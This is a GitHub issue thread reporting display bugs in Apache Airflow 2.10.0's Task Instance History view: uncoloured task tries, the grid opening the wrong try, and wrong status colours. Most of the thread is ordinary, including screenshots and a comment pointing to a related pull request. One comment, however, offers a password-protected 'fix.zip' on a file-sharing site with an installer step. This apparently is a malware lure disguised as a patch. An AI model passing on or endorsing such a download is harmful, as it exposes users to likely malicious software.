### ISSUE TITLE
Task Instance History - inconsistencies

### ISSUE THREAD

**Issue by raphaelauv** [apache/airflow#41742]
### Apache Airflow version

2.10.0

### What happened?

I see a lot of inconsistencies with Task Instance History

some task tries without a color 

![Screenshot from 2024-08-26 10-07-05](https://github.com/user-attachments/assets/55526807-a5c5-44c6-9e9b-f5dff81d95d4)

---
sometimes when you click on a task of the grid it open a random ( not latest ) task tries , here it show task tries number 3

![Screenshot from 2024-08-26 09-33-50](https://github.com/user-attachments/assets/e1f77789-0fbc-4347-a47e-885c14a32643)

---

also sometimes it just show wrong color , here task is in succes but it show a small red square
![Screenshot from 2024-08-26 10-09-47](https://github.com/user-attachments/assets/77efd122-5a4e-4fe9-b83f-4361288f143f)

![Screenshot from 2024-08-25 22-48-33](https://github.com/user-attachments/assets/0c834df2-69c4-4a1d-89b4-85facec07772)

[Screencast from 26-08-2024 10:41:43.webm](https://github.com/user-attachments/assets/059e2db0-201a-47db-be5f-9b0a2f4048b5)

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tirkarthi** [comment]
Related fix https://github.com/apache/airflow/pull/41503 . cc: @bbovenzi
